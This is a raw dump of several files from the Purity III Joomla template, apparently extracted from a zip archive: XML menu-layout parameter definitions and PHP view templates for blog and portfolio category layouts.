                <option value="rauthor">JGLOBAL_AUTHOR_REVERSE_ALPHABETICAL</option>
                <option value="hits">JGLOBAL_MOST_HITS</option>
                <option value="rhits">JGLOBAL_LEAST_HITS</option>
                <option value="order">JGLOBAL_ORDERING</option>
            </field>

            <field name="order_date" type="list"
                   description="JGLOBAL_ORDERING_DATE_DESC"
                   label="JGLOBAL_ORDERING_DATE_LABEL"
                    >
                <option value="">JGLOBAL_USE_GLOBAL</option>
                <option value="created">JGLOBAL_CREATED</option>
                <option value="modified">JGLOBAL_MODIFIED</option>
                <option value="published">JPUBLISHED</option>
            </field>

			<field name="subcat_info_positions" type="list"
						 multiple="true"
						 description="TPL_MAGAZINE_SUB_INTRO_POSITION_DESC"
						 label="TPL_MAGAZINE_SUB_INTRO_POSITION_LABEL"
				>
				<option value=""></option>
				<option value="leading">TPL_MAGAZINE_SUB_INTRO_POS_LEADING</option>
				<option value="intro">TPL_MAGAZINE_SUB_INTRO_POS_INTRO</option>
				<option value="link">TPL_MAGAZINE_SUB_INTRO_POS_LINKS</option>
			</field>

			<field name="show_category_title" type="list"
						 label="JGLOBAL_SHOW_CATEGORY_TITLE"
						 description="JGLOBAL_SHOW_CATEGORY_TITLE_DESC"
				>
				<option value="">JGLOBAL_USE_GLOBAL</option>
				<option value="0">JHIDE</option>
				<option value="1">JSHOW</option>
			</field>

			<field name="show_description" type="list"
						 description="JGLOBAL_SHOW_CATEGORY_DESCRIPTION_DESC"
						 label="JGLOBAL_SHOW_CATEGORY_DESCRIPTION_LABEL"
				>
				<option value="">JGLOBAL_USE_GLOBAL</option>
				<option value="0">JHIDE</option>
				<option value="1">JSHOW</option>
			</field>

			<field name="show_description_image" type="list"
						 description="JGLOBAL_SHOW_CATEGORY_IMAGE_DESC"
						 label="JGLOBAL_SHOW_CATEGORY_IMAGE_LABEL"
				>
				<option value="">JGLOBAL_USE_GLOBAL</option>
				<option value="0">JHIDE</option>
				<option value="1">JSHOW</option>
			</field>

			<field name="show_subcat_intro" type="list"
						 description="TPL_MAGAZINE_SUB_SHOW_INTRO_DESC"
						 label="TPL_MAGAZINE_SUB_SHOW_INTRO_LABEL"
						 default="1"
				>
				<option value="0">JHIDE</option>
				<option value="1">JSHOW</option>
			</field>

			<field name="show_pagination" type="list"
						 description="JGLOBAL_PAGINATION_DESC"
						 label="JGLOBAL_PAGINATION_LABEL"
				>
				<option value="">JGLOBAL_USE_GLOBAL</option>
				<option value="0">JHIDE</option>
				<option value="1">JSHOW</option>
				<option value="2">JGLOBAL_AUTO</option>
			</field>

			<field name="show_pagination_results" type="list"
						 label="JGLOBAL_PAGINATION_RESULTS_LABEL"
						 description="JGLOBAL_PAGINATION_RESULTS_DESC">

				<option value="">JGLOBAL_USE_GLOBAL</option>
				<option value="0">JHIDE</option>
				<option value="1">JSHOW</option>
			</field>

			<field name="category_layout" type="componentlayout"
						 label="Category Layout"
						 description="JFIELD_ALT_COMPONENT_LAYOUT_DESC"
						 useglobal="true"
						 extension="com_content" view="category"
						 default="magazine-sub"
				/>

		</fieldset>

		<fieldset name="article_options" label="TPL_MAGAZINE_ARTICLE_LABEL">

			<field name="article_layout" type="componentlayout"
						 label="TPL_MAGAZINE_ARTICLE_LAYOUT_LABEL"
						 description="JFIELD_ALT_COMPONENT_LAYOUT_DESC"
						 useglobal="true"
						 extension="com_content" view="article"
				/>

			<field name="show_intro" type="list"
						 description="JGLOBAL_SHOW_INTRO_DESC"
						 label="JGLOBAL_SHOW_INTRO_LABEL"
				>
				<option value="">JGLOBAL_USE_GLOBAL</option>
				<option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
				<option value="0">JHIDE</option>
				<option value="1">JSHOW</option>
			</field>

		</fieldset>

		<fieldset name="article_info_options" label="TPL_MAGAZINE_ARTICLE_INFO_LABEL">

			<field name="show_title" type="list"
						 description="JGLOBAL_SHOW_TITLE_DESC"
						 label="JGLOBAL_SHOW_TITLE_LABEL"
				>
				<option value="">JGLOBAL_USE_GLOBAL</option>
				<option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
				<option value="0">JHIDE</option>
				<option value="1">JSHOW</option>
			</field>

			<field name="link_titles" type="list"
						 description="JGLOBAL_LINKED_TITLES_DESC"
						 label="JGLOBAL_LINKED_TITLES_LABEL"
				>
				<option value="">JGLOBAL_USE_GLOBAL</option>
				<option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
				<option value="0">JNO</option>
				<option value="1">JYES</option>
			</field>

			<field name="info_block_position"
						 type="list"
						 default=""
						 label="COM_CONTENT_FIELD_INFOBLOCK_POSITION_LABEL">
				<option value="">JGLOBAL_USE_GLOBAL</option>
				<option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
				<option value="0">COM_CONTENT_FIELD_OPTION_ABOVE</option>
				<option value="1">COM_CONTENT_FIELD_OPTION_BELOW</option>
				<option value="2">COM_CONTENT_FIELD_OPTION_SPLIT</option>
			</field>

			<field name="show_category" type="list"
						 description="JGLOBAL_SHOW_CATEGORY_DESC"
						 label="JGLOBAL_SHOW_CATEGORY_LABEL"
				>
				<option value="">JGLOBAL_USE_GLOBAL</option>
				<option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
				<option value="0">JHIDE</option>
				<option value="1">JSHOW</option>
			</field>

			<field name="link_category" type="list"
						 description="JGLOBAL_LINK_CATEGORY_DESC"
						 label="JGLOBAL_LINK_CATEGORY_LABEL"
				>
				<option value="">JGLOBAL_USE_GLOBAL</option>
				<option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
				<option value="0">JNO</option>
				<option value="1">JYES</option>
			</field>

			<field name="show_parent_category" type="list"
						 description="JGLOBAL_SHOW_PARENT_CATEGORY_DESC"
						 label="JGLOBAL_SHOW_PARENT_CATEGORY_LABEL"
				>
				<option value="">JGLOBAL_USE_GLOBAL</option>
				<option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
				<option value="0">JHIDE</option>
				<option value="1">JSHOW</option>
			</field>

			<field name="link_parent_category" type="list"
						 description="JGLOBAL_LINK_PARENT_CATEGORY_DESC"
						 label="JGLOBAL_LINK_PARENT_CATEGORY_LABEL"
				>
				<option value="">JGLOBAL_USE_GLOBAL</option>
				<option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
				<option value="0">JNO</option>
				<option value="1">JYES</option>
			</field>

			<field name="show_author" type="list"
						 description="JGLOBAL_SHOW_AUTHOR_DESC"
						 label="JGLOBAL_SHOW_AUTHOR_LABEL"
				>
				<option value="">JGLOBAL_USE_GLOBAL</option>
				<option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
				<option value="0">JHIDE</option>
				<option value="1">JSHOW</option>
			</field>

			<field name="link_author" type="list"
						 label="JGLOBAL_LINK_AUTHOR_LABEL">
				<option value="">JGLOBAL_USE_GLOBAL</option>
				<option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
				<option value="0">JNo</option>
				<option value="1">JYes</option>
			</field>

			<field name="show_create_date" type="list"
						 description="JGLOBAL_SHOW_CREATE_DATE_DESC"
						 label="JGLOBAL_SHOW_CREATE_DATE_LABEL"
				>
				<option value="">JGLOBAL_USE_GLOBAL</option>
				<option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
				<option value="0">JHIDE</option>
				<option value="1">JSHOW</option>
			</field>

			<field name="show_modify_date" type="list"
						 description="JGLOBAL_SHOW_MODIFY_DATE_DESC"
						 label="JGLOBAL_SHOW_MODIFY_DATE_LABEL"
				>
				<option value="">JGLOBAL_USE_GLOBAL</option>
				<option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
				<option value="0">JHIDE</option>
				<option value="1">JSHOW</option>
			</field>

			<field name="show_publish_date" type="list"
						 description="JGLOBAL_SHOW_PUBLISH_DATE_DESC"
						 label="JGLOBAL_SHOW_PUBLISH_DATE_LABEL"
				>
				<option value="">JGLOBAL_USE_GLOBAL</option>
				<option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
				<option value="0">JHIDE</option>
				<option value="1">JSHOW</option>
			</field>

			<field name="show_item_navigation" type="list"
						 description="JGLOBAL_SHOW_NAVIGATION_DESC"
						 label="JGLOBAL_SHOW_NAVIGATION_LABEL"
				>
				<option value="">JGLOBAL_USE_GLOBAL</option>
				<option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
				<option value="0">JHIDE</option>
				<option value="1">JSHOW</option>
			</field>

			<field
				name="show_vote" type="list"
				label="JGLOBAL_SHOW_VOTE_LABEL"
				description="JGLOBAL_SHOW_VOTE_DESC"
				>
				<option value="">JGLOBAL_USE_GLOBAL</option>
				<option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
				<option value="0">JHIDE</option>
				<option value="1">JSHOW</option>
			</field>

			<field
				name="show_readmore"
				type="list"
				description="JGLOBAL_SHOW_READMORE_DESC"
				label="JGLOBAL_SHOW_READMORE_LABEL"
				>
				<option value="">JGLOBAL_USE_GLOBAL</option>
				<option value="0">JHIDE</option>
				<option value="1">JSHOW</option>
			</field>

			<field
				name="show_readmore_title"
				type="list"
				label="JGLOBAL_SHOW_READMORE_TITLE_LABEL"
				description="JGLOBAL_SHOW_READMORE_TITLE_DESC"
				>
				<option value="">JGLOBAL_USE_GLOBAL</option>
				<option value="0">JHIDE</option>
				<option value="1">JSHOW</option>
			</field>

			<field name="show_icons" type="list"
						 label="JGLOBAL_SHOW_ICONS_LABEL"
				>
				<option value="">JGLOBAL_USE_GLOBAL</option>
				<option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
				<option value="0">JHIDE</option>
				<option value="1">JSHOW</option>
			</field>

			<field name="show_print_icon" type="list"
						 label="JGLOBAL_SHOW_PRINT_ICON_LABEL">
				<option value="">JGLOBAL_USE_GLOBAL</option>
				<option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
				<option value="0">JHIDE</option>
				<option value="1">JSHOW</option>
			</field>

			<field name="show_email_icon" type="list"
						 label="JGLOBAL_Show_Email_Icon_Label">
				<option value="">JGLOBAL_USE_GLOBAL</option>
				<option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
				<option value="0">JHIDE</option>
				<option value="1">JSHOW</option>
			</field>

			<field name="show_hits" type="list"
						 label="JGLOBAL_SHOW_HITS_LABEL">
				<option value="">JGLOBAL_USE_GLOBAL</option>
				<option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
				<option value="0">JHIDE</option>
				<option value="1">JSHOW</option>
			</field>

			<field name="show_noauth" type="list"
						 description="JGLOBAL_SHOW_UNAUTH_LINKS_DESC"
						 label="JGLOBAL_SHOW_UNAUTH_LINKS_LABEL">
				<option value="">JGLOBAL_USE_GLOBAL</option>
				<option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
				<option value="0">JNO</option>
				<option value="1">JYES</option>
			</field>

		</fieldset>
	</fields>
</metadata>
PKԜ�\��G99.purity_iii/html/com_content/category/xblog.phpnu&1i�<?php
 /**
 *------------------------------------------------------------------------------
 * @package Purity III Template - JoomlArt
 * @version 1.0 Feb 1, 2014
 * @author JoomlArt http://www.joomlart.com
 * @copyright Copyright (c) 2004 - 2014 JoomlArt.com
 * @license GNU General Public License version 2 or later;
 *------------------------------------------------------------------------------
 */

defined('_JEXEC') or die;

JHtml::addIncludePath(JPATH_COMPONENT.'/helpers');

JHtml::_('behavior.caption');
$items = $this->items;
?>
<div class="blog<?php echo $this->pageclass_sfx;?>" itemscope itemtype="http://schema.org/Blog">
	<?php if ($this->params->get('show_page_heading', 1)) : ?>
		<div class="page-header">
			<h1> <?php echo $this->escape($this->params->get('page_heading')); ?> </h1>
		</div>
	<?php endif; ?>

	<?php if ($this->params->get('show_category_title', 1) or $this->params->get('page_subheading')) : ?>
		<h2> <?php echo $this->escape($this->params->get('page_subheading')); ?>
			<?php if ($this->params->get('show_category_title')) : ?>
				<span class="subheading-category"><?php echo $this->category->title;?></span>
			<?php endif; ?>
		</h2>
	<?php endif; ?>

	<?php if ($this->params->get('show_tags', 1) && !empty($this->category->tags->itemTags)) : ?>
		<?php echo JLayoutHelper::render('joomla.content.tags', $this->category->tags->itemTags); ?>
	<?php endif; ?>

	<?php if ($this->params->get('show_description', 1) || $this->params->def('show_description_image', 1)) : ?>
		<div class="category-desc clearfix">
			<?php if ($this->params->get('show_description_image') && $this->category->getParams()->get('image')) : ?>
				<img src="<?php echo $this->category->getParams()->get('image'); ?>"/>
			<?php endif; ?>
			<?php if ($this->params->get('show_description') && $this->category->description) : ?>
				<?php echo JHtml::_('content.prepare', $this->category->description, '', 'com_content.category'); ?>
			<?php endif; ?>
		</div>
	<?php endif; ?>


	<?php if (!empty($items)) : ?>
		<div class="blog-items clearfix">
			<?php foreach ($items as &$item) : ?>
				<div class="row blog-item<?php echo $item->state == 0 ? ' system-unpublished' : ''; ?>" itemprop="blogPost" itemscope itemtype="http://schema.org/BlogPosting">
					<?php
					$this->item = &$item;
					echo $this->loadTemplate('item');
					?>
				</div>
			<?php endforeach; ?>
		</div>
	<?php endif; ?>

	<?php if (($this->params->def('show_pagination', 1) == 1  || ($this->params->get('show_pagination') == 2)) && ($this->pagination->get('pages.total') > 1)) : ?>
		<div class="pagination">
			<?php  if ($this->params->def('show_pagination_results', 1)) : ?>
				<p class="counter pull-right"> <?php echo $this->pagination->getPagesCounter(); ?> </p>
			<?php endif; ?>
			<?php echo $this->pagination->getPagesLinks(); ?> </div>
	<?php  endif; ?>
</div>
PKԜ�\߱�33.purity_iii/html/com_content/category/xblog.xmlnu&1i�<?xml version="1.0" encoding="utf-8"?>
<metadata>
	<layout title="xLayout - Blog" option="COM_CONTENT_CATEGORY_VIEW_BLOG_OPTION">
		<help
			key = "JHELP_MENUS_MENU_ITEM_ARTICLE_CATEGORY_BLOG"
		/>
		<message>
			<![CDATA[COM_CONTENT_CATEGORY_VIEW_BLOG_DESC]]>
		</message>
	</layout>

	<!-- Add fields to the request variables for the layout. -->
	<fields name="request">
		<fieldset name="request"
		 >

			<field name="id" type="category"
				description="JGLOBAL_CHOOSE_CATEGORY_DESC"
				extension="com_content"
				label="JGLOBAL_CHOOSE_CATEGORY_LABEL"
				required="true"
			/>
		</fieldset>
	</fields>

	<!-- Add fields to the parameters object for the layout. -->
<fields name="params">
<fieldset name="basic" label="Basic">

    <field name="layout_type" type="hidden" default="blog"/>
    <field name="category_layout" type="hidden" default="_:xblog"/>
    <field name="num_leading_articles" type="hidden" default="0"/>
    <field name="num_links" type="hidden" default="0"/>
    <field name="num_intro_articles" type="text"
           description="Number of items"
           label="# Items"
           size="3"
           default="12"
            />
    <field name="show_subcategory_content" type="list"

           description="JGLOBAL_SHOW_SUBCATEGORY_CONTENT_DESC"
           label="JGLOBAL_SHOW_SUBCATEGORY_CONTENT_LABEL"
           default="-1"
            >
        <option value="">JGLOBAL_USE_GLOBAL</option>
        <option value="0">JNONE</option>
        <option value="-1">JALL</option>
        <option value="1">J1</option>
        <option value="2">J2</option>
        <option value="3">J3</option>
        <option value="4">J4</option>
        <option value="5">J5</option>
    </field>
    <field name="orderby_pri" type="list"
           description="JGLOBAL_CATEGORY_ORDER_DESC"
           label="JGLOBAL_CATEGORY_ORDER_LABEL"
            >
        <option value="">JGLOBAL_USE_GLOBAL</option>
        <option value="none">JGLOBAL_NO_ORDER</option>
        <option value="alpha">JGLOBAL_TITLE_ALPHABETICAL</option>
        <option value="ralpha">JGLOBAL_TITLE_REVERSE_ALPHABETICAL</option>
        <option value="order">JGLOBAL_CATEGORY_MANAGER_ORDER</option>
    </field>

    <field name="orderby_sec" type="list"
           description="JGLOBAL_ARTICLE_ORDER_DESC"
           label="JGLOBAL_ARTICLE_ORDER_LABEL"
            >
        <option value="">JGLOBAL_USE_GLOBAL</option>
        <option value="front">COM_CONTENT_FEATURED_ORDER</option>
        <option value="rdate">JGLOBAL_MOST_RECENT_FIRST</option>
        <option value="date">JGLOBAL_OLDEST_FIRST</option>
        <option value="alpha">JGLOBAL_TITLE_ALPHABETICAL</option>
        <option value="ralpha">JGLOBAL_TITLE_REVERSE_ALPHABETICAL</option>
        <option value="author">JGLOBAL_AUTHOR_ALPHABETICAL</option>
        <option value="rauthor">JGLOBAL_AUTHOR_REVERSE_ALPHABETICAL</option>
        <option value="hits">JGLOBAL_MOST_HITS</option>
        <option value="rhits">JGLOBAL_LEAST_HITS</option>
        <option value="order">JGLOBAL_ORDERING</option>
    </field>

    <field name="order_date" type="list"
           description="JGLOBAL_ORDERING_DATE_DESC"
           label="JGLOBAL_ORDERING_DATE_LABEL"
            >
        <option value="">JGLOBAL_USE_GLOBAL</option>
        <option value="created">JGLOBAL_CREATED</option>
        <option value="modified">JGLOBAL_MODIFIED</option>
        <option value="published">JPUBLISHED</option>
    </field>

    <field name="article_layout" type="componentlayout"
                 label="Article Layout"
                 description="JFIELD_ALT_COMPONENT_LAYOUT_DESC"
                 useglobal="true"
                 extension="com_content" view="article"
                    />
</fieldset>

    <fieldset name="article" label="COM_CONTENT_ATTRIBS_FIELDSET_LABEL">
        <field name="show_title" type="list"
               description="JGLOBAL_SHOW_TITLE_DESC"
               label="JGLOBAL_SHOW_TITLE_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="link_titles" type="list"
               description="JGLOBAL_LINKED_TITLES_DESC"
               label="JGLOBAL_LINKED_TITLES_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JNO</option>
            <option value="1">JYES</option>
        </field>

        <field name="show_intro" type="list"
               description="JGLOBAL_SHOW_INTRO_DESC"
               label="JGLOBAL_SHOW_INTRO_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field
                name="info_block_position"
                type="list"
                default=""
                label="COM_CONTENT_FIELD_INFOBLOCK_POSITION_LABEL">
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">COM_CONTENT_FIELD_OPTION_ABOVE</option>
            <option value="1">COM_CONTENT_FIELD_OPTION_BELOW</option>
            <option value="2">COM_CONTENT_FIELD_OPTION_SPLIT</option>
        </field>

        <field name="show_category" type="list"
               description="JGLOBAL_SHOW_CATEGORY_DESC"
               label="JGLOBAL_SHOW_CATEGORY_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="link_category" type="list"
               description="JGLOBAL_LINK_CATEGORY_DESC"
               label="JGLOBAL_LINK_CATEGORY_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JNO</option>
            <option value="1">JYES</option>
        </field>

        <field name="show_parent_category" type="list"
               description="JGLOBAL_SHOW_PARENT_CATEGORY_DESC"
               label="JGLOBAL_SHOW_PARENT_CATEGORY_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="link_parent_category" type="list"
               description="JGLOBAL_LINK_PARENT_CATEGORY_DESC"
               label="JGLOBAL_LINK_PARENT_CATEGORY_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JNO</option>
            <option value="1">JYES</option>
        </field>

        <field name="show_author" type="list"
               description="JGLOBAL_SHOW_AUTHOR_DESC"
               label="JGLOBAL_SHOW_AUTHOR_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="link_author" type="list"
               label="JGLOBAL_LINK_AUTHOR_LABEL">
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JNo</option>
            <option value="1">JYes</option>
        </field>

        <field name="show_create_date" type="list"
               description="JGLOBAL_SHOW_CREATE_DATE_DESC"
               label="JGLOBAL_SHOW_CREATE_DATE_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="show_modify_date" type="list"
               description="JGLOBAL_SHOW_MODIFY_DATE_DESC"
               label="JGLOBAL_SHOW_MODIFY_DATE_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="show_publish_date" type="list"
               description="JGLOBAL_SHOW_PUBLISH_DATE_DESC"
               label="JGLOBAL_SHOW_PUBLISH_DATE_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="show_item_navigation" type="list"
               description="JGLOBAL_SHOW_NAVIGATION_DESC"
               label="JGLOBAL_SHOW_NAVIGATION_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>


        <field
                name="show_vote" type="list"
                label="JGLOBAL_SHOW_VOTE_LABEL"
                description="JGLOBAL_SHOW_VOTE_DESC"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option	value="1">JSHOW</option>
        </field>

        <field
                name="show_readmore"
                type="list"
                description="JGLOBAL_SHOW_READMORE_DESC"
                label="JGLOBAL_SHOW_READMORE_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field
                name="show_readmore_title"
                type="list"
                label="JGLOBAL_SHOW_READMORE_TITLE_LABEL"
                description="JGLOBAL_SHOW_READMORE_TITLE_DESC"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="show_icons" type="list"
               label="JGLOBAL_SHOW_ICONS_LABEL">
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="show_print_icon" type="list"
               label="JGLOBAL_SHOW_PRINT_ICON_LABEL">
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="show_email_icon" type="list"
               label="JGLOBAL_Show_Email_Icon_Label">
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="show_hits" type="list"
               label="JGLOBAL_SHOW_HITS_LABEL">
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JHIDE</option>
            <option value="1">JSHOW</option>
        </field>

        <field name="show_noauth" type="list"
               description="JGLOBAL_SHOW_UNAUTH_LINKS_DESC"
               label="JGLOBAL_SHOW_UNAUTH_LINKS_LABEL"
                >
            <option value="">JGLOBAL_USE_GLOBAL</option>
            <option value="use_article">COM_CONTENT_FIELD_VALUE_USE_ARTICLE_SETTINGS</option>
            <option value="0">JNO</option>
            <option value="1">JYES</option>
        </field>

    </fieldset>
</fields>
</metadata>
PKԜ�\�s;FF2purity_iii/html/com_content/category/portfolio.phpnu&1i�<?php
 /**
 *------------------------------------------------------------------------------
 * @package Purity III Template - JoomlArt
 * @version 1.0 Feb 1, 2014
 * @author JoomlArt http://www.joomlart.com
 * @copyright Copyright (c) 2004 - 2014 JoomlArt.com
 * @license GNU General Public License version 2 or later;
 *------------------------------------------------------------------------------
 */

// no direct access
defined('_JEXEC') or die('Restricted access');

$cols = $this->params->get('num_columns', 3);
$span = floor(12 / $cols);
$key = 0;
$items = $this->items;
?>

<div class="porfolio<?php if ($this->params->get('pageclass_sfx')) echo ' ' . $this->params->get('pageclass_sfx'); ?>" itemscope itemtype="http://schema.org/Blog">

	<?php if ($this->params->get('show_page_heading', 1)) : ?>
	<div class="page-header">
		<h1> <?php echo $this->escape($this->params->get('page_heading')); ?></h1>
	</div>
	<?php endif; ?>

	<?php //JAHelper::loadModules('inline') ?>
	<!-- Item list -->
	<div class="porfolio-items">

	<?php foreach ($items as $item):
		?>
		<?php if ($key % $cols == 0) : ?>
		<!-- Row -->
		<div class="row row-porfolio">
	<?php endif ?>

			<div class="col-md-<?php echo $span ?>">
				<?php
				// Load category_item.php by default
				$this->item = $item;
				echo $this->loadTemplate('item');
				?>
			</div>

			<?php if ((($key+1) % $cols == 0) || $key+1 == count($this->items)) : ?>
			</div>
			<!-- // Row -->
		<?php endif ?>
			<?php
			$key++;
		endforeach; ?>

	</div>
	<!-- // Item list -->

	<!-- Pagination -->
	<?php
	if ($this->pagination->getPagesLinks()): ?>
		<div class="pagination-wrap">
			<?php echo $this->pagination->getPagesLinks(); ?>
			<p class="counter pagination-counter">
				<?php echo $this->pagination->getPagesCounter(); ?>
			</p>
		</div>
	<?php endif; ?>
	<!-- //Pagination -->

</div>
PKԜ�\�Hhb}1}12purity_iii/html/com_content/category/portfolio.xmlnu&1i�<?xml version="1.0" encoding="utf-8"?>
<metadata>
	<layout title="xLayout - Portfolio" option="COM_CONTENT_CATEGORY_VIEW_BLOG_OPTION">
		<help
			key = "JHELP_MENUS_MENU_ITEM_ARTICLE_CATEGORY_BLOG"
		/>
		<message>
			<![CDATA[COM_CONTENT_CATEGORY_VIEW_BLOG_DESC]]>
		</message>
	</layout>

	<!-- Add fields to the request variables for the layout. -->
	<fields name="request">
		<fieldset name="request"
		 >

			<field name="id" type="category"
				description="JGLOBAL_CHOOSE_CATEGORY_DESC"
				extension="com_content"
				label="JGLOBAL_CHOOSE_CATEGORY_LABEL"
				required="true"
			/>
		</fieldset>
	</fields>

	<!-- Add fields to the parameters object for the layout. -->
<fields name="params">
<fieldset name="basic" label="Basic">

    <field name="layout_type" type="hidden" default="blog"/>
    <field name="category_layout" type="hidden" default="_:portfolio"/>
    <field name="num_leading_articles" type="hidden" default="0"/>
    <field name="num_links" type="hidden" default="0"/>
    <field name="num_intro_articles" type="text"
           description="Number of items"
           label="# Items"
           size="3"
           default="12"
            />

    <field name="num_columns" type="text"
           label="JGLOBAL_NUM_COLUMNS_LABEL"
           size="3"
            />

    <field name="orderby_pri" type="list"
           description="JGLOBAL_CATEGORY_ORDER_DESC"
           label="JGLOBAL_CATEGORY_ORDER_LABEL"
            >
        <option value="">JGLOBAL_USE_GLOBAL</option>
        <option value="none">JGLOBAL_NO_ORDER</option>
        <option value="alpha">JGLOBAL_TITLE_ALPHABETICAL</option>
        <option value="ralpha">JGLOBAL_TITLE_REVERSE_ALPHABETICAL</option>
        <option value="order">JGLOBAL_CATEGORY_MANAGER_ORDER</option>
    </field>

    <field name="orderby_sec" type="list"
           description="JGLOBAL_ARTICLE_ORDER_DESC"
           label="JGLOBAL_ARTICLE_ORDER_LABEL"
            >
        <option value="">JGLOBAL_USE_GLOBAL</option>
        <option value="front">COM_CONTENT_FEATURED_ORDER</option>
        <option value="rdate">JGLOBAL_MOST_RECENT_FIRST</option>
        <option value="date">JGLOBAL_OLDEST_FIRST</option>
        <option value="alpha">JGLOBAL_TITLE_ALPHABETICAL</option>
        <option value="ralpha">JGLOBAL_TITLE_REVERSE_ALPHABETICAL</option>
        <option value="author">JGLOBAL_AUTHOR_ALPHABETICAL</option>
        <option value="rauthor">JGLOBAL_AUTHOR_REVERSE_ALPHABETICAL</option>
        <option value="hits">JGLOBAL_MOST_HITS</option>
